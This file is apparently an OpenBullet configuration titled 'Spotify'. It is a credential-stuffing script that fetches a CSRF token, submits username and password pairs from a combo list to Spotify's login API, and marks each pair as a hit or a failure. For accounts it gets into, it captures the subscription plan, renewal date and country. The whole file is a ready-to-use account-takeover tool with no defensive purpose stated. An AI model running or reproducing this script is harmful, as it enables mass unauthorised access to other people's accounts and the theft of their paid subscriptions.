[SETTINGS]
{
  "Name": "Spotify",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2019-06-21T17:33:30.7533024+01:00",
  "AdditionalInfo": "",
  "Author": "DarkStarWarden",
  "Version": "1.1.3",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "UserPass",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST GET "https://accounts.spotify.com/en/login?continue=https:%2F%2Fwww.spotify.com%2Fus%2Faccount%2Foverview%2F" EncodeContent=TRUE 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#Token PARSE "<COOKIES(csrf_token)>" LR "" "" -> VAR "CSRF" 

#Login REQUEST POST "https://accounts.spotify.com/api/login" 
  CONTENT "remember=true&username=<USER>&password=<PASS>&csrf_token=<CSRF>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  COOKIE "__bon: MHwwfC0xNDAxNTMwNDkzfC01ODg2NDI4MDcwNnwxfDF8MXwx" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "InvalidCredentials" 
  KEYCHAIN Success OR 
    KEY "displayName" 

#Capture REQUEST GET "https://www.spotify.com/uk/account/subscription/" EncodeContent=TRUE 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.80 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#Capture PARSE "<SOURCE>" LR "checkmark\"></use></svg></span>" "<" -> CAP "Premium Subscription" 

#Capture PARSE "<SOURCE>" LR "id=\"\"><h3 class=\"product-name\">" "<" -> CAP "Family Subscription" 

#Capture PARSE "<SOURCE>" LR "<b class=\"recurring-date\">" "<" -> CAP "Renewal" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "FREE" OR 
    KEY "Spotify Free" 

REQUEST GET "https://www.spotify.com/uk/account/overview/" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#Capture PARSE "<SOURCE>" LR "\"Country\",\"value\":\"" "\"" -> CAP "Country" 

